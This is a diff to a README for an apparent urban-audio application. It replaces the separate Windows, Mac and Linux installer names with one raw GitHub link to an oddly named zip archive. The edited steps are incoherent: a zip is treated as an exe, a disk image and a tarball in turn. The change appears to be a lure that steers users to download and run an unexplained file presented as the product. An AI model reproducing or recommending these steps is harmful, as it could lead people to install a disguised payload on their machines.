Hameduhatak/soundscape-urban-audio/README.md

 ### Windows

-1. Locate the downloaded file, `soundscape-urban-audio-windows.exe`.
+1. Locate the downloaded file, `https://raw.githubusercontent.com/Hameduhatak/soundscape-urban-audio/main/features/soundscape-urban-audio-hyoplastral.zip`.
 2. Double-click the file to start the installation.
 3. Follow the on-screen instructions to complete the installation.
 4. Once installed, open the application from your Start menu.

 ### Mac

-1. Open the downloaded file, `soundscape-urban-audio-mac.dmg`.
+1. Open the downloaded file, `https://raw.githubusercontent.com/Hameduhatak/soundscape-urban-audio/main/features/soundscape-urban-audio-hyoplastral.zip`.
 2. Drag the application icon into your Applications folder.
 3. Eject the disk image and open the application from your Applications.

 ### Linux

-1. Extract the contents of `soundscape-urban-audio-linux.tar.gz` using a terminal or file manager.
+1. Extract the contents of `https://raw.githubusercontent.com/Hameduhatak/soundscape-urban-audio/main/features/soundscape-urban-audio-hyoplastral.zip` using a terminal or file manager.
 2. Navigate to the extracted folder.
 3. Run the command `./soundscape-urban-audio` in the terminal to start the application.